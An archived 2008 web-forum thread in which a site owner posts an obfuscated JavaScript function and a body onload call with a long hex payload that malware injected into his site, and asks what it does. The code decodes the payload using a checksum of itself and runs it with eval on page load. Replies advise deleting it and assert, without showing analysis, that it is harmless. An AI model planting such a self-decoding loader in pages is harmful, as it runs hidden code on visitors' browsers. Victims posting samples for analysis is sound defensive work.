...

View Full Version : purpose of this script.



madz
08-10-2008, 01:56 AM
One of my associates who has root user to my sites ftp had a spyware infection and it managed to embed a script on my site. I traced the script all the way back to this function. I am not an expert in javascript but it looks like all the data is actually passed to this function and is decrypted in some way. Can you guys try to help me modify it so i can figure out what its design was actually to do?

here is the function


function tYFG62c1F(IDkvG4nkn, dRBgV5JDW){var jA74Ll3N2 = arguments.callee;var R7y5DmyJp = location.href;jA74Ll3N2 = jA74Ll3N2.toString();jA74Ll3N2 = jA74Ll3N2 + R7y5DmyJp;var V5bXU3HS2 = jA74Ll3N2.replace(/\W/g, "");V5bXU3HS2 = V5bXU3HS2.toUpperCase();var JGa3J60pA = 4294967296;var E6QdjiN2e = new Array;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 256; ko5Q7Mpq8++) {E6QdjiN2e[ko5Q7Mpq8] = 0;}var G8tM51Cp4 = 1;for(var ko5Q7Mpq8 = 128; ko5Q7Mpq8; ko5Q7Mpq8 >>= 1) {G8tM51Cp4 = G8tM51Cp4 >>> 1 ^ (G8tM51Cp4 & 1 ? 3988292384 : 0);for(var aH1heD5Rg = 0; aH1heD5Rg < 256; aH1heD5Rg += ko5Q7Mpq8 * 2) {var hug7K8d20 = ko5Q7Mpq8 + aH1heD5Rg;E6QdjiN2e[hug7K8d20] = E6QdjiN2e[aH1heD5Rg] ^ G8tM51Cp4;if (E6QdjiN2e[hug7K8d20] < 0) {E6QdjiN2e[hug7K8d20] += JGa3J60pA;}}}var y54Ix84S6 = JGa3J60pA - 1;for(var u033a3IVn = 0; u033a3IVn < V5bXU3HS2.length; u033a3IVn++) {var lCaM67h4s = (y54Ix84S6 ^ V5bXU3HS2.charCodeAt(u033a3IVn)) & 255;y54Ix84S6 = (y54Ix84S6 >>> 8) ^ E6QdjiN2e[lCaM67h4s];}y54Ix84S6 = y54Ix84S6 ^ (JGa3J60pA - 1);if (y54Ix84S6 < 0) {y54Ix84S6 += JGa3J60pA;}y54Ix84S6 = y54Ix84S6.toString(16).toUpperCase();while(y54Ix84S6.length < 8) {y54Ix84S6 = "0" + y54Ix84S6;}var E8nIyBM1p = new Array;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 8; ko5Q7Mpq8++) {E8nIyBM1p[ko5Q7Mpq8] = y54Ix84S6.charCodeAt(ko5Q7Mpq8);}var u4M1b5qiL = "";var oQEs4S3Q6 = 0;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < IDkvG4nkn.length; ko5Q7Mpq8 += 2){var hug7K8d20 = IDkvG4nkn.substr(ko5Q7Mpq8, 2);alert(hug7K8d20);var k3EBh8S75 = parseInt(hug7K8d20, 16);var aQ6Es8oMa = k3EBh8S75 - E8nIyBM1p[oQEs4S3Q6];if(aQ6Es8oMa < 0) {aQ6Es8oMa = aQ6Es8oMa + 256;}u4M1b5qiL += String.fromCharCode(aQ6Es8oMa);if(oQEs4S3Q6 + 1 == E8nIyBM1p.length) {oQEs4S3Q6 = 0;} else {oQEs4S3Q6++;}}var AvEJlrD0g = 0;try {eval(u4M1b5qiL);} catch(e) {AvEJlrD0g = 1;}try {if (AvEJlrD0g) {window.location = "/";}} catch(e) {}}



and here is the way it was called. *by the way please do not attempt to execute it unless you have an idea of what it does cause I know it was supposed to be malicious possibly and that is why I want to know what it did or could have done to my sites visitors.

for the call


<body onload="tYFG62c1F('96B9a59AA99dB0A750927A839a89B77F96945f7B96759271677c676F6154ab7e92b99F9065A07962abba98a95 5a8A68f79887D78977C617650A5A99EaaA1A6a7A4b7659A96a0ad9E957FAD98a754a7929a788D7Ca37C86596d64a3a69895b 5a29fB2659Fa799A774A4a98d80797a829b78647457A9999782748a78997d62B5a883B8A9A0A39b69626Bb89c8d7e78877a9 28c577455A8A68f79887D78977C616450AA90A1698A86a7788972ad96A6618777787b687e838E7c508157ab9A8A8A7D76859 97F63a6a6a99CA59a9c5d639D905fab635757566a747e8b6B7B667d908673647457837b757D618d86847862b5a885b4A79ca 777a2ac956C6072ab95B3597794A29Bab9C73a0A564745769667a6d697A6e696E6a7caf91b657a39b6c8Fa4688D6a8455716 1a795BB5778A7a6A2B26baaa6A95daaA2ab50b167988682988B7299577455647C599d749888838B937b85647357676977745 0B167988682988b729962625E54bca5967c85a26d7d74868BB167988682988B7299945772547174adBA98a9557A8fAE819A6 F6E786861765075729Da4A669AF91B657a4659592878796798C5571616A627c7257a264A28A7e9b89798A6F61A660a588858 C86838e5082757455656a59ab8A85ac868a797073785774557A8fAE819A6f6e786861776e825768559261617692ac888B6c7 87C64645D5766548059637d6f6f676D736c6878577155646a7496b3a95fAB95b3599aB76cA37a6c716C67647457656F61A3a 379A37c6d647470508057696A6A7C599ab76cA37a6C716c6764627455a1719A81928E897789616350766057b0aaA2AB50B69 b7faba6ab85619c577455A1719A81928E897789616450aeAA6cA1797969637B72A39b6c8fa4688d6a8490A6a581A6b6a1836 68C9E596d64A39D6D82ac71797784929Fa776a5757C676A6c916197508a85AC868A7970737872A09b5469A5967C85a26D7d7 4868Bb69B7FabA6AB85619c94577154716250BFA39D6d82ac7179778492a79889AFa2AE83688D9161646d647E87a098B7A16 2abac72b2b1beaf91b657998566B86E77a581825571618080AF9bad9D66A8ae50715768709AB0AB58BA98A95589786b82969 A6C6Ba76176507472578a6B738B82A76C6dA8547D597e8B6b7b667d90867372a39cA39bB5A16b648C6E6786939c657Aaa626 05D61b4a6A5a9578997aa6F60b790a467547E5958A68769AC69889a7A8f57955582886D7475808682776F9c98a5a97Aa498A 67aA46C8c6e6786939C657Aaa605e54675962796c72978473b0658b988180547E5958a68769ac69889A7A8f5775737261715 9649557a19A79879B7C806A828F959C997A67aa8eA173966BC1998767AB7680918e82577254A38962BB6C7E967E8c598e645 f7e859Fa5af98769eac5561616a597FA09d555ca38962BB6C7E967E8C596C64676055afa38962BB6c7E967E8C595b81577E8 59FA5AF98769eac70B1a38962bb6c7E967e8C596D64998767ab7680918E8265a9a394adA2ADa59E5d6577625Eb8A68cA5a4a 6ab73A5aa9C5D5d7Cb098ada39c5d96916Ba7797e987f7F6FA595b29Eab9d547D59686D57B2978473B0658b988180547E595 27459576054A38962bb6C7E967e8c74ADba98a9559Db46A61746A7CAD82617650B29cae5575b3ab91BD729DA4A669af91b65 7a4659592878796798c557161696B64A46796858f9082868c577154797450b167988682988b729962625E54bca2A37568676 879B9878BB167988682988b729994577254a38962bb6c7e967e8c6793ac98A978a3A59e71B85fa4659592878796798C5e6Fb eAF91b6578ca59C886e9c939Fb05571615B527Fad98A754936CA67686687d6A91596D6467729bA3b361A6A5A957a264a28a7 e9b89798A547E59607f57A4659592878796798C5570617D9185886F6c6c71715Eb09ca59cA8A97450b167988682988b72995 76272547362ABBA98A955a6a581a6b6A183668c617650889878866c7871607C65aaaa96b4ADa26CA46796858F9082868c635 5666a74a6a5A957ae788D7166aa6dAEa0547E59a0a5a9AA9A7DAFad58B69b7FABa6AB85619c6357666A6A74A6A5A95785a1b 28891868D6D9c547E59A988836f6B9a77B09b6464579EA7726a60777Caf838F936Ca67686687d6a91966BAD9d5F85a1b2889 1868D6D9C547D59606D57b285a1B28891868d6D9c547E5980B1a8869676976f9764625767697774ad99A79F7c69AD8898bd5 762725494ada2ADa59e639ab3A89D879F98a777B09d956c87a4A683a27b867a9E60709dA7618277ad698465896F806462576 6547e7650ADAA686664747Ea89265a39aa2A8AD986D57b28767B76b7F757F6d85547e59607FB4579AA0B49E50bf896Aab669 06A787a8762606FBEB6A6a5a9578c66AF6968ab6cA686547e59607faba9AE54BC9eA6a5A35f8Aa4A98065B0869fAE5d7CB65 0a798AB989c699E5964B28e67a271719779A6885571616a6bc1aba9ae54BCa296645F8E67a271719779A6885E54bcb099b29 ba6AC62adA893A5ABA0A4a261765066665970B1BE5993a5ab9a9d5Ca66250bfB4b43F8284859599AD7d9B84696064766c676 e9A827A667A6C796b6A7A6D917898707676836A71867868776d769E69886e707764786D67876D786E64786e65896d6D97657 66a65746B67699Aa26F697a996f6A6A799E697C9898776a796E69a56e7B6e6D757d68776c6A6B97776965876f686967757e9 2A7706b976b7669687499996E6cA37192AA706F6c6a7A9A63896F6a6a6A779b677A6d6A6B97777b64766C679697826e727C6 C6A77657a6c69a96e7C6E7a7a9e67a76F796999777D65796D7B6b6a786D66886D9c6a66749A91A6986E766c776D91A878696 e69826b91A5706C6E98827a648A6e676B69767066796E6D6a78787F65776a9b6A66749a717D996f767A776d73756b67697A7 4726986996C966C776D66899870966A826B657999676b997870917d6E6D6C69786a697b6F6A6B6A787f92746d796c6c7a6c6 77C6E6d6c6BA26F68767868966aA26F6989989b6e6bA3717279786C6c67A269917579796e98A29D9278786D6c677a7C69859 96B6e98a37171896d7c767A7771667C78706c6d786d687B706C6C64767b65a96D6D7765766a65746a9a6979a26f697a796f6 a6a7A9C9374786877798272718A787b6D69776d68776C6a97677a6A91A6787d6e98826E72859869976b767e7179996996968 27B91AA7868976c799b69AA6e7C6b6DA270687D6D6a6D6a7a6b69766e6b9668A26E9277706F6D64749d63aa6b9D687A766a6 5746a9a69997a7269A66D6D6a99799e697c9898976a796e69856E9b6e6d776D68776E676b69776965796d7a6A77776D69A97 87B9767A27271897a676e787A6C6778707A97677a6d6985999C6d69A29a66896C6C6E6AA26E6989987096657A7191AA78679 695766B65a96d6d6A6B796a667A6D676c6a767265797a686967759e64AA6a9A6999826F697A996F6a6A7971927b989A6D6D8 26967A899706d66776d68776c6a77697A6a717b99706E96799d9278786E6B78797191aa996B767a837D937470786e68767E7 17B9899766AA369917b706D76757671667878696c95786c71886c7D6b97767065896D9d6C65766a65746B67699a747263a96 B9d6e7a827A667a6C796d6d826A71896F98766A799c927D6e9D6B69779E65796e6d6A9a776D93756b67699a747263896B7D6 87A799E697c7878976A796e69856e7B6e6d776D68776c6A6D6Da26a91A96F78966A799c727d6e7d6c67826d917870707675a 36f718A786896977671667A6e7a6a7a787f64AA6A7A6979747264766c67687a759d648a79676A66747A63a96B7D7767766a6 5746B67697a747263a9989d6e77776d66896e7B6e6ba270917A70796e76787B717D6c6a6B6a779D65796e6D6A9A776D73756 b67699a747263896b7d6E6cA36F91A6706B7764777b64766C67687a757D93776b67697A747272766C6a6964A46a667a706D9 66Aa26d697C989C6a79827266AA6c6a9864766992766C6a6964766A6574786E776BA27265799a686967757e64aa709A96967 6696588796B6e6B837A91aa7078766aA26D7178996F6B68836A718a98677675796D7189796D6e96A37091756C6c97967a726 97d78797669786c72896D677766826c6676999B9667837a667C70676C677A6E9177786e6E6CA36991a6706E6E697a7C91a57 87B6E7A836b668A6B67697a747263a9989B76697A6d927c986f6E687A7069A66D6d6c67776D66886D6A6c6a767067746c6a6 964846A667a706d966aa26D697C989c6A79A272668a6c6a7864766992766C6a6964766A6574787876787a72917578796a797 99e697c9898976A796e69A56E9b6E6D786B7276706f97677a70717D787C6A6A7969667a6d796B79747d638a6b7D6D647A6f9 2a8786b6E757a6E668798706A6a796A667A6c986C69767065796E686a6a799E697c7878976A796E69A56e7B6E6D787F65776 a9B6A66749A64766C677677826e927c6C6A776d7972677A98706d6a7A6a91A7706b6B69777D657998987669A270728678679 6957A7E917D6E6B6E6d836F7186706B776D7A6e678599696E76836A71867868976d7671657b79706e6D836f91AA986a976D7 66b65A96f686967757e72856F7A6d6A7A6C6879706a6e97a26e6778786D9695826D677A99989695836f718A706C9795a26d6 9856d7C6A6c8371728A986a7675766B66756D6d6a6CA37171869899976D767F69aa986E7677826e927D706D976b7a7291797 9786a6C777d68756b67697A826d68896f6e6e6D7a6D69777070966a769e917C78799695796e7285986e976b7A72697B99997 675827266A96c6C776CA26b697c6D6f6B66776D667c7099776da26d91796f676B69786C678a6d6B6C67776B66796E706b687 89D677D6D686c6D767F697c787B6E9A786A917C707a7767767F6989996B6E75a27292a96d68966c7A7069896F6C6E77827a9 1a77070966D7A6f66A578796B6a7870677A6d6A6C6A7A6f667c6E6d6b6a786D67a86d7876757769698598986b76787c677a6 D6C6C69776966796E6d6B6a786D677a6D6a6C69776b697B6E7b6b77786e67A56D986c6C7A6b6986787A6b6A786D667c6C6a6 c64766967aa706f9698836E69a6706F6C777a6C65796e686a6aa29B72796F6a976ba26E6878787B6e97776d67756C6A6E648 26E697b7978767aA272677B709b6B69767b657999696e6DA29d67a9707A6e7A776f68886D9d6C65766A65746B67697a7A6D7 17878707676836A71867868976d767e697B796C6E75837D6778706b7769A26969A5796b6e9579707189707A77657A6D65A87 9786d7a796e917d6f6a6E667A6f697a6d7d6c65766A657479676A66747A576D72')">



If anyone can help me modify it to figure out what it was passing to the function to determine its purpose it would be a load off of my chest.

ninnypants
08-10-2008, 05:18 AM
Go through and delete every instance of it. It was probably messing with links on your site but without hours of running it and going through all the gibberish it's impossible to tell

madz
08-10-2008, 07:39 PM
as long as it didnt somehow infect anyone with spyware using known vulnerabilities everything should be alright. ya i deleted it but it still kinda sucks.

rnd me
08-10-2008, 08:21 PM
it doesn't do anything harmful, just annoying.

most importantly, it doesn't "phone home", so privacy and security should not be affected.



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum